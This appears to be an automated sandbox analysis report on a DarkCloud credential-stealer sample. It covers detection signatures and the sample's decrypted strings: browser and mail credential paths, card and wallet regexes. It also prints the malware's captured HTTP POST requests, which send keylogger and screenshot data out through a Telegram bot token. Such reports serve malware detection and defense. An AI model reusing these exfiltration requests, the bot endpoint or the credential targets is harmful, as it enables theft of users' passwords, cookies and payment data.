Windows Analysis Report
MSM8C42iAN.exe

Overview

General Information

Sample name: MSM8C42iAN.exe
renamed because original name is a hash value
Original sample name: d2678115448e9a9e3909fb7dcaf85eca9a28326fbd93d77d8608fd4d526c7dbb.exe
Analysis ID: 1562316
MD5: 1a170c3b6fba79020b7c24631d25ad93
SHA1: 4b2f3033eea4069c5685e9e6ca782f8f2551a685
SHA256: d2678115448e9a9e3909fb7dcaf85eca9a28326fbd93d77d8608fd4d526c7dbb
Tags: exeuser-adrian__luca
Infos:

Detection

DarkCloud
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DarkCloud
AI detected suspicious sample
Machine Learning detection for sample
PE file has a writeable .text section
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
DarkCloud Stealer Stealer is written in Visual Basic. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: MSM8C42iAN.exe Avira: detected
Found malware configuration
Source: MSM8C42iAN.exe Malware Configuration Extractor: DarkCloud {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendMessage?chat_id=6115850689"}
Multi AV Scanner detection for submitted file
Source: MSM8C42iAN.exe ReversingLabs: Detection: 65%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: MSM8C42iAN.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: MSM8C42iAN.exe String decryptor: Cookies
Source: MSM8C42iAN.exe String decryptor: ^(0x){1}[0-9a-fA-F]{40}$
Source: MSM8C42iAN.exe String decryptor: ^([13][a-km-zA-HJ-NP-Z1-9]{25,34})|^((bitcoincash:)?(q|p)[a-z0-9]{41})|^((BITCOINCASH:)?(Q|P)[A-Z0-9]{41})$
Source: MSM8C42iAN.exe String decryptor: ^([r])([1-9A-HJ-NP-Za-km-z]{24,34})$
Source: MSM8C42iAN.exe String decryptor: ^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$
Source: MSM8C42iAN.exe String decryptor: ^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$
Source: MSM8C42iAN.exe String decryptor: ^G[ABCDEFGHIJKLMNOPQRSTUVWXYZ234567]{55}$
Source: MSM8C42iAN.exe String decryptor: \Default\Login Data
Source: MSM8C42iAN.exe String decryptor: \Login Data
Source: MSM8C42iAN.exe String decryptor: //setting[@name='Password']/value
Source: MSM8C42iAN.exe String decryptor: Password :
Source: MSM8C42iAN.exe String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: MSM8C42iAN.exe String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: MSM8C42iAN.exe String decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
Source: MSM8C42iAN.exe String decryptor: SMTP Email Address
Source: MSM8C42iAN.exe String decryptor: NNTP Email Address
Source: MSM8C42iAN.exe String decryptor: Email
Source: MSM8C42iAN.exe String decryptor: HTTPMail User Name
Source: MSM8C42iAN.exe String decryptor: HTTPMail Server
Source: MSM8C42iAN.exe String decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
Source: MSM8C42iAN.exe String decryptor: Password
Source: MSM8C42iAN.exe String decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
Source: MSM8C42iAN.exe String decryptor: Foxmail.exe
Source: MSM8C42iAN.exe String decryptor: ^3[47][0-9]{13}$
Source: MSM8C42iAN.exe String decryptor: ^(6541|6556)[0-9]{12}$
Source: MSM8C42iAN.exe String decryptor: ^389[0-9]{11}$
Source: MSM8C42iAN.exe String decryptor: ^3(?:0[0-5]|[68][0-9])[0-9]{11}$
Source: MSM8C42iAN.exe String decryptor: ^63[7-9][0-9]{13}$
Source: MSM8C42iAN.exe String decryptor: ^(?:2131|1800|35\\d{3})\\d{11}$
Source: MSM8C42iAN.exe String decryptor: ^9[0-9]{15}$
Source: MSM8C42iAN.exe String decryptor: ^(6304|6706|6709|6771)[0-9]{12,15}$
Source: MSM8C42iAN.exe String decryptor: ^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$
Source: MSM8C42iAN.exe String decryptor: Mastercard
Source: MSM8C42iAN.exe String decryptor: ^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$
Source: MSM8C42iAN.exe String decryptor: ^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$
Source: MSM8C42iAN.exe String decryptor: ^(62[0-9]{14,17})$
Source: MSM8C42iAN.exe String decryptor: Visa Card
Source: MSM8C42iAN.exe String decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$
Source: MSM8C42iAN.exe String decryptor: Visa Master Card
Source: MSM8C42iAN.exe String decryptor: \signons.sqlite
Source: MSM8C42iAN.exe String decryptor: \logins.json
Source: MSM8C42iAN.exe String decryptor: mail\
Source: MSM8C42iAN.exe String decryptor: \Accounts\Account.rec0
Source: MSM8C42iAN.exe String decryptor: \AccCfg\Accounts.tdat
Source: MSM8C42iAN.exe String decryptor: EnableSignature
Source: MSM8C42iAN.exe String decryptor: Application : FoxMail
Source: MSM8C42iAN.exe String decryptor: encryptedUsername
Source: MSM8C42iAN.exe String decryptor: logins
Source: MSM8C42iAN.exe String decryptor: encryptedPassword
Source: MSM8C42iAN.exe String decryptor: \Cookies
Source: MSM8C42iAN.exe String decryptor: \Default\Cookies
Source: MSM8C42iAN.exe String decryptor: \cookies.sqlite
Source: MSM8C42iAN.exe String decryptor: \cookies.db
Uses 32bit PE files
Source: MSM8C42iAN.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49934 version: TLS 1.2
Source: Binary string: W.pdb4 source: MSM8C42iAN.exe

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49810 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49819 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.9:49810 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49843 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49858 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.9:49858 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49867 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49882 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.9:49882 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49891 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49918 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49907 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.9:49907 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49945 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49934 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.9:49934 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49961 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.9:49961 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49970 -> 149.154.167.220:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 162.55.60.2 162.55.60.2
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: showip.net
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49727 -> 162.55.60.2:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 8455Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 634Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
Source: global traffic DNS traffic detected: DNS query: showip.net
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 8455Connection: Keep-AliveCache-Control: no-cache
Source: MSM8C42iAN.exe, 00000000.00000003.1442468987.0000000003451000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442490992.000000000065C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schema.org
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.net
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.net.
Source: MSM8C42iAN.exe, 00000000.00000003.1891223171.000000000060F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1813011207.000000000060E000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442580909.0000000000607000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.net/
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.0000000000607000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.net/1
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.net4
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.netd
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.netll
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.netpD
Source: MSM8C42iAN.exe, 00000000.00000003.1442490992.000000000065C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.maxmind.com
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSM8C42iAN.exe, 00000000.00000003.1891081431.0000000003493000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891132344.0000000000664000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: MSM8C42iAN.exe, 00000000.00000003.1891132344.0000000000664000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/abcdefghijklmnopqrstuvwxyz
Source: MSM8C42iAN.exe String found in binary or memory: https://api.telegram.org/bot
Source: MSM8C42iAN.exe, 00000000.00000003.1891081431.0000000003493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=
Source: MSM8C42iAN.exe, 00000000.00000003.1813114556.0000000000667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSM8C42iAN.exe, 00000000.00000003.1442535526.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442510011.0000000000641000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1
Source: MSM8C42iAN.exe, 00000000.00000003.1890989393.000000000346B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: MSM8C42iAN.exe, 00000000.00000003.1442468987.0000000003451000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442490992.000000000065C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://showip.net/
Source: MSM8C42iAN.exe, 00000000.00000003.1442468987.0000000003451000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442490992.000000000065C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://showip.net/?checkip=
Source: MSM8C42iAN.exe, 00000000.00000003.1442490992.000000000065C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unpkg.com/leaflet
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSM8C42iAN.exe, 00000000.00000003.1442535526.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442510011.0000000000641000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7
Source: MSM8C42iAN.exe, 00000000.00000003.1442468987.0000000003451000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442490992.000000000065C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.openstreetmap.org/copyright
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
